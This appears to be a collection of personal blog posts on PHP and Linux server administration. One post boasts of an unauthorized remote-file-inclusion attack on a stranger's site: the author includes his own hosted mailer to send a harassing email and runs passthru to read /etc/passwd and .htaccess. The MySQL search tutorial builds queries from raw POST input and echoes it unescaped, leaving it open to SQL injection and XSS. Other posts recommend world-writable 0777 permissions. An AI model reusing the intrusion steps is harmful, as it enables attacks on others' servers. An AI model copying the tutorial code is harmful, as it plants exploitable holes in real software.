This is a common request we get for Ioncube to be installed. It’s generally not an issue, but when you factor in other optimization plugins like Zend and eAccelerator, a common misconception is that the three don’t get along. It’s very easy to install Ioncube into a PHP installation that already has Zend and eAccelerator.

This tutorial is specific to cPanel, assuming that you are using php 5.2.x with Zend 3.x.x.

If you need help installing eAccelerator, you can see this tutorial. For help with installing Zend, you can go here. The versions in both these tutorials are outdated, so you’ll probably want to apply the instructions to the newest versions available.
Go to http://www.ioncube.com/loader_download.php and pick your download. This example assumes that you are using php 5.2.

cd /usr/src
wget http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_lin_x86.tar.gz
tar -xvzf ioncube_loaders_lin_x86.tar.gz
cd ioncube

Copy the loader config to the user’s public_html or another location where you can access it from a browser.

cp ioncube-loader-helper.php /home/username/public_html

Now in your browser go to the loader file that you just copied. This file will tell you exactly which extension you need to use. Choose the ‘php.ini Installation Instructions’ link, and you should see something like this after the php config output:

zend_extension = /<path>/ioncube_loader_lin_5.2.so

Move the ioncube directory to a more permanent location:

mv /usr/src/ioncube /usr/local
chown -Rf root:root /usr/local/ioncube

Edit the php.ini and add look for this section (may not be exact):

[Zend]
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.0.1
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.0.1
zend_optimizer.version=3.0.1
zend_extension=/usr/local/Zend/lib/ZendExtensionManager.so
zend_extension_ts=/usr/local/Zend/lib/ZendExtensionManager_TS.so

Above this section, add this line:

zend_extension=/usr/local/ioncube/ioncube_loader_lin_5.2.so

Of course, make sure that the .so file is the one that the loader helper told you to use! After that is added, STOP and then START Apache to make sure that it’s loading. You should now see IonCube in your phpinfo file.

If you’re using eAccelerator, you shouldn’t need to change the location of the plugin loader in your php.ini.

Note that if Apache doesn’t start, it’s probably because of the order in which you have Zend and ioncube loading.  The lines for Ioncube should be above those for Zend optimizer.

Lastly, you should test your IonCube installation to make sure that it can decode its own files. In the original ‘ioncube’ directory that you moved, there’s a test ‘ioncube-encoded-file.php’ file that you can load through a browser to make sure that it works.

Working with a webhosting company I get asked all the time — which programming language is better? It’s obvious that I’m more bias towards PHP, but there are other great languages out there that may be more suitable for certain people creating certain sites. I’ve decided to write a nutshell comparison on the most common languages, so you can decide for yourself.

PHP

My preferred language, PHP, is the most popular and widely-used dynamic programming language on the Internet. As a result, it’s increasingly become easy to learn (I have 4 brain cells and even I could do it) and can be run on virtually any operating system. It’s popularity has resulted in the availability of thundreds of contributions, modules, and addons for PHP to increase its functionality and integration with other software. It’s also free to download and easy to install (for most people), and is the most common in CMS’s and prebundled website software.

The major downside to PHP is that it’s so popular that security holes are being found all the time. Its very nature requires some configuration changes and restrictions in order to boost security.

Perl

Perl is one of the oldest and most successful languages to date. With thousands of modules that can be added, it can pretty much do anything. While it’s currently not as popular as PHP, it’s more efficient for server management in its double use as a shell scripting language. It’s also open-source and compatible for most all OS’s. The only real downside is that it’s not as quick and easy to learn, and even the simplest tasks can take more programming and lines of code to accomplish. Also, the camel logo is fugly.

ASP/VBScript

I’ll try to be nice about this one. Really, I’m not an ASP fan mainly because it’s proprietary to Windows and IIS. That being said, I’m sure you can figure how secure and reliable it is. It’s not as actively maintained by its developers (Microsoft) so major bugs have been known to linger for months — unacceptable for busy webmasters trying to manage professional websites. While ASP, .net, and VBScript (aka the ASP family) are all “free”, if you want any of the fancy addons or modules for them you’ll be owing Microsoft a nice little licensing fee. On a positive note, Chilisoft has made is possible to port ASP over to Linux, so it’s no longer 100% platform dependent.

JSP

Java Server Pages (developed by Sun) is more similar to the ASP framework, but targeted towards Java fanatics. Out of all the programming languages I’ve studied in school, JSP is probably my least favorite. Not only is it hard to learn, but there’s no such thing as simplicity with it. However, it’s very powerful software and is platform-independent, as long as you have a Java Environment for it to run in. Tomcat (an Apache Project) is the most common servlet container for JSP. But, Java takes up a lot of memory and JSP servers are very difficult to maintain and administer for non-experts.

Ruby

Ruby is one of the newer programming language to hit the web developer market, and it’s actually quite close in concept to PHP except that it’s 100% object-oriented, and very clean because you don’t need as much punctuation. It’s also very beginner-friendly, and is growing in popularity. The main disadvantage to Ruby is that it’s difficult to troubleshoot runtime errors because its reluctance to declare variables before their use. And being that it’s a newer language, there are definitely less resources available and not as many applications currently employing Ruby as a framework. However, it is cross-platform compatible, easy to install, and even easier to learn.

Python

I really don’t know a whole lot about Python other than that expert programmers claim that it’s such a strong language. I personally think it’s crap…my one shot at Python and I find out that it’s very whitespace/tab sensitive, so one extra space can ruin your program. Coming from PHP I don’t find that very appealing…I personally think it’s a mistake, and that its developers just call it a ‘programming guideline’ since they can’t figure out how to fix it. Really, there’s no huge benefit in using Python other than for your Google sitemaps, so all I’m going to say is steer clear.

HTML

I put this at the bottom of the list because I don’t really consider it a programming language, but it is the more predominate and widely used language that all the others revolve around. I do think it’s important that every programmer become an expert in HTML before going dynamic with their coding. While other languages rely on HTML for output, it’s very common for sites to be purely HTML and nothing else. However, HTML is a static language with no dynamic capabilities in itself whatsoever, so it’s somewhat boring on its own

Client-side

In a category all its own, there are several client-side languages that augment the others. Client side languages no require any server-side software to be installed, just a browser capable of interpreting them. CSS (Cascading Style Sheets) is a language primarily used in formatting and creating a uniform and repetitive style for use across multiple pages. JavaScript is a mini-java language used to create mild effects for a website, like popup windows and form validation. I also consider it to be very insecure, so it should be used sparingly. AJAX is a newer JavaScript framework that is more appealing to the eye and lets you create those special effects that you see on many web 2.0 sites…things like refresh-less page loading.

Earlier I showed some examples of commands you can use to pull software versions into a simple PHP script. In the next example I’ll show how to do the distro and kernel versions. I’m sure that there’s a much simpler way to do this (i.e. a simple cat command on the /proc/version file), but I figured I’d use a more advanced example in the form of a function. I did the distro as a variable to show how easy this is:


<?php
function kernelinfo () {
$buf = exec( 'cat /proc/version');
if ( $buf == "ERROR" ) {
$result = "N.A.";
} else {
if (preg_match('/version (.*?) /', $buf, $ar_buf)) {
$result = $ar_buf[1];

if (preg_match('/SMP/', $buf)) {
$result .= ' (SMP)';
}
}
}
return $result;
}

$distro = exec('cat /etc/redhat-release');

$kernel = kernelinfo();

echo $distro;

echo "<html><br></html>";

echo $kernel;

?>


This will show a result of the following, obviously various depending on your platform:

CentOS release 4.5 (Final)
2.6.9-023stab033.9-enterprise (SMP)

Keep in mind that this script (as the last) requires the ability to pass shell commands through PHP. So, you would need to be able to the exec function, or replace it with system, passthru, escapeshellcmd, or shell_exec if those are allowed in your php.ini configuration. Also, if you run PHP as an Apache module, this will not work if you have open_basedir protection enabled.

I’ve been working on this application for work that does some simple server reporting, part of which involves displaying the versions of major software running on the machines. The importance of this to me personally is that since we have over 30 shared servers hosting multiple customers, we are continually moving websites between servers. Some of our older generation servers are still running MySQL 4.0 and PHP 4.3, so I need to be aware of this to make sure that customers are being moved to servers with compatible versions. It’s also good in tracking and planning upgrades.

I find it best to use the exec() function since it’s not blocked by most hosts. However, if you are on a shared host it’s very likely that certain PHP functions are disallowed in the php.ini. In that case you may be able to subsitute exec with system, passthru, escapeshellcmd, or shell_exec…unless those are blocked too. Then I guess you’re out of luck.

Start by creating some variables to store ordinary shell commands. If you wanted to find the php version from command line, you would usually type:

php -v

This will give a huge chunk of crap that you really don’t need if you’re making a simple version display script. In this case, you can use grep, awk, sed, and cut to trim down the output into a one-liner:

php -v |grep built |awk {‘print $2′}

The awk command prints out columns, so in the above example I’m printing out the second column of the line that contains the word ‘built’. Once the desired output is figured out, you simply assign it to a variable passed through exec() or a similar function:

$phpver = exec("php -v |grep built |awk {'print $2'}");

Then you can call the variable $phpver anywhere in your script:

echo "PHP Version: $phpver";

You can probably go through and figure out the commands to show other software versions on your server. In my script I’m showing the perl, php, mysql, apache, python, cpanel, and ruby versions. Here are the commands I used:

<?php

$perlver = exec("perl -v |grep linux |awk {'print $4'}|sed -e 's/v//'");
$phpver = exec("php -v |grep built |awk {'print $2'}");
$mysqlver = exec("mysql -V |awk {'print $5'} | sed -e 's/,//'");
$apachever = exec("apachectl -v |grep version |awk {'print $3 $4'}|sed -e 's/Apache\///'");
$pythonver = exec("python -V 2>&1 | sed -e 's/Python //'");
$cpanelver = exec("cat /usr/local/cpanel/version");
$rubyver = exec("ruby -v |awk {'print $2'}"); ?>

Then I just echoed out all the variables to display my version numbers:

See here .

I figured this might be helpful to post since it seems to be a fairly common issue poking up about PHP’s limits in regard to file size. It’s no secret to fellow programmers that PHP is incapable of readily handling files over 2gb on the typical 32-bit system, but others are easily aggravated with a greeting of errors that look like this:

PHP Warning: ……. failed to open stream: File too large in ……..

Generally I’d say that if you’re trying to get PHP to man-handle huge files you’d need to have one badass server that can take that kind of abuse. Before you go about trying to compile PHP with large file support, you may want to consider passing the ‘split’ command through the system or passthru functions to break your massive files into smaller bits so PHP can handle them. If you’re the type that has to go about everything the hard way, then I guess that’s why you visited my site.
To compile PHP with large file support, you need to add a simple compiler flag preceding your configure statement. This should look as so:

# CFLAGS=”-D_FILE_OFFSET_BITS=64″ ./configure –with-modules-that-i-use

Then your make && make install and (if all goes without error) you should now be able to work with large files with PHP.

Too bad nothing’s really straight forward, eh? Apache itself has a filesize limit too (even up to 2.2.4) so don’t waste your time trying to get your newly-compiled PHP installation to work with Apache. When I was first trying to work this out I figured that it’s best to have two PHP installations, one for Apache and the other just for the CLI.

To do this, create yourself a phpinfo file and copy the configure line, removing the single quotes from around each flag. Two things you’ll want to change though:

• Remove the ”–with-apxs2=/usr/local/apache/bin/apxs‘ (or similar) flag to keep the installer from compiling against Apache
• Change your –prefix to a different location. I used ”–prefix=/usr/php-lfs’ .

When the installation is done, make it easier on yourself by creating some symlinks to the new binary:

ln -s /usr/php-lfs/bin/php /usr/bin/php5

ln -s /usr/php-lfs/bin/php /usr/local/bin/php5

This way you have your LFS-compiled PHP version in /usr/bin/php5 to use for your scripts. To call them, you’d use:

php5 /path/to/script or /usr/bin/php5 /path/to/script

What if you actually want to call the script from a browser? Well, you still can’t load a large file in the browser itself, but you can process it through a script to have a process run on the server:

<?php passthru('/usr/bin/php5 myscript.php'); ?>



And that should pretty much do it.

Just a nice life lesson for my fellow lazy programmers:

I was looking at this site the other day in class while I was researching some crap on sub-netting (which is not one of my high points btw) and I noticed an all-too-obvious URL structure that just screamed “hack me! please!” It’s a pagerank 5 site so I know that it’s getting quite a bit of traffic, so I’m surprised this hasn’t happened enough to the point where the site developer would fix his shit. Probably an example of the worst URL compilation I’ve seen in a while:

http://hiswebsite.com/index.php?page=subnett-2.php

I wrote simple php mailing script called ‘spam-me.php’ and uploaded it to my school space, then ran it off the guy’s site. I think I sent one of my professors an email about how unsatisfied his wife is, simply by tacking on my URL as the page definition:

http://hiswebsite.com/index.php?page=http://students.ecpi.edu/~<omitted>/spam-me.php

It was even better when I was able to view his .htaccess and /etc/passwd files by writing using the passthru function in another script that I ran from his site:

<?php passthru("cat ./.htaccess");
passthru("cat /etc/passwd");


?>

Since I’m a good person I emailed the guy about this little security problem of his. I can’t say he took it very well (it was more like someone killed his dog and left parts of it bundled up in gift wrapping on his doorstep), but the next day he took his site down. I made a point to mention that this wouldn’t have happened if he:

1. Used the file_exists() function to specify what filenames can be presented in his URL
2. Had mod_security installed so I couldn’t view his .htaccess
3. Maybe disable allow_url_fopen so my site couldn’t be called as an include
4. Had open_basedir protection so his system files can’t be accessed by php

Worse case I could have sent out a school-wide email offering penis enlargement pills, and then execute a root kit on his server. But then again, I’m a nice person, remember?

If you use MySQL to keep a ton of records, it might be nice to be able to search for the particular entry you’re looking for via a simple form on your site. To set this up, we’ll make two scripts — one being the form itself, the other being script that executes the MySQL query.

In this example I created a simple form to query a database to look a person’s last name from a database column in an ‘addressbook’ database. First, we need to create the form. This is just a simple html file with a single input field:

<html>
<body>
<h4>Enter Last Name:</h4>
<form action="query.php" method="post">
Server: <input name="lastName" type="text" />
<input type="submit" value="Submit" />
</form>
</body>
</html>


Here i named the form field ‘lastName’, which will be the variable passed on to the php script and returned later on, and that the form action is set to ‘query.php’, which is the name of the script processing the form. Next, create a file called query.php:

In the first section we need to define a few database variables to allow the script to connect to the database:


<?php
// Make a MySQL Connection
$dbhost = "localhost";
$dbname = "database_name";
$dbuser = "database_user";
$dbpass = "password";


Next, we need to define the posted variable ‘lastName’, which we created in the form to allow that variable to pass into this script. If you have register_globals turned on (which is a BAD idea), you don’t need to do this.


$lastName = $_POST['lastName'];

Now for actual query itself. The syntax you use to search a database table is as follows:

SELECT <what info> FROM <table> WHERE <column>='<search term'>

So in that case, I want to select everything from the ‘names’ table where the last name is equal to what I search for, denoted by the variable ‘lastName’

$query = "SELECT * FROM names WHERE lastname='$lastName'";

Similarly if you wanted to search two tables in one query you can just use the UNION command like so:

$query = "SELECT * FROM name WHERE lastname='$lastName' UNION SELECT * FROM morenames WHERE lastName='$lastName'


Now that all that crap is defined, create the database link:


$dblink = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($dbname, $dblink);
?>

Now you can echo the results back into an array (in case there is more than one entry):

<h2> Query Results for <?php echo($lastName); ?> : </h2>
<?php
$result = mysql_query($query) or die(mysql_error());
$row = mysql_fetch_array($result) or die(mysql_error());
while($row = mysql_fetch_array($result)){
echo $row['lastName']. " ", $row['firstName'];
echo "<br />";
}
?>

To explain above, the query is run against the database and the results are fetched as an array. The row(s) contained the search terms are then displayed to the screen based on the colums specified, which in this case are ‘firstName’ and ‘lastName’
In case you’re on the slower end, here’s the entire query.php script:

<?php
// Make a MySQL Connection
$dbhost = "localhost";
$dbname = "database_name";
$dbuser = "database_user";
$dbpass = "password";

$lastName = $_POST['lastName'];

$query = "SELECT * FROM names WHERE lastname='$lastName'";

$dblink = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($dbname, $dblink);
?>

<h2> Query Results for <?php echo($lastName); ?> : </h2>
<?php
$result = mysql_query($query) or die(mysql_error());
$row = mysql_fetch_array($result) or die(mysql_error());
while($row = mysql_fetch_array($result)){
echo $row['lastName']. " ", $row['firstName'];
echo "<br />";
}
?>

Back in the day I posted my horror of upgrading my server to PHP 6.  You might as well face it — PHP 5 is going to be dead in a few years just like PHP 4 is now, so it’s a good idea for all you programmers and server admins to start making your shit compatible ahead of time.  Luckily David Walsh saved me a long boring blog post, so you can read all about it here.

PHP uses the same command as *nix systems when dealing with changing permissions for files:

chown – changes ownership, but can only be done by a root user
chgrp – changes group ownership, can be done by a user who is a member of the new group
chmod – changes permissions, can be done by the user (and sometimes the group) that owns the file

These commands are particularly useful in situations where PHP runs as a different user on the system, which is common when PHP is compiled as an Apache user. A lot of our customers get frustrated at the fact that once they use PHP to create a file, their user can’t touch it. That’s why whenever you have PHP create a file that needs to be neutral, its permissions have to be set accordingly.

The syntax of those commands are simple:

chown($file, $user)
chgrp($file, $group)
chmod($file, $permissions)

The simplest example of using these commands is a follows:

<?php
$file = "myfile.txt";
$handler = fopen($file, 'w') or die("can't create file");
chmod($file, '0777');
fclose($handler); ?>


In this example, I had the PHP script create a file called ‘myfile.txt’ in write mode, then change its permissions to 777.  This is of course the simplest example in the world, but you can make them much more complex.

For more information on using fopen to handle files, you can read this.  Also, when you set permissions you have to use the octal value (0777) instead of just 777.

I hate using the jarbled output of ifconfig to find out what ip addresses are active on a server, so using this complex command will list all the IP addresses of the server in a nice little list:

ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'

I specifically use this command for a VPS setup script that I was working on to automatically input the correct server IP into the httpd.conf and named entries on cloned systems, so I don’t have to do it manually. To do this you would just assign the command as a variable, then call that variable with the replace command:

IP=`ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
cat httpd.conf |replace 123.456.789.123 $IP --httpd.conf

If you want to incorporate this into a PHP script, you just need to use the system() function, assuming your host allows it:

<?php system("ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'"); ?>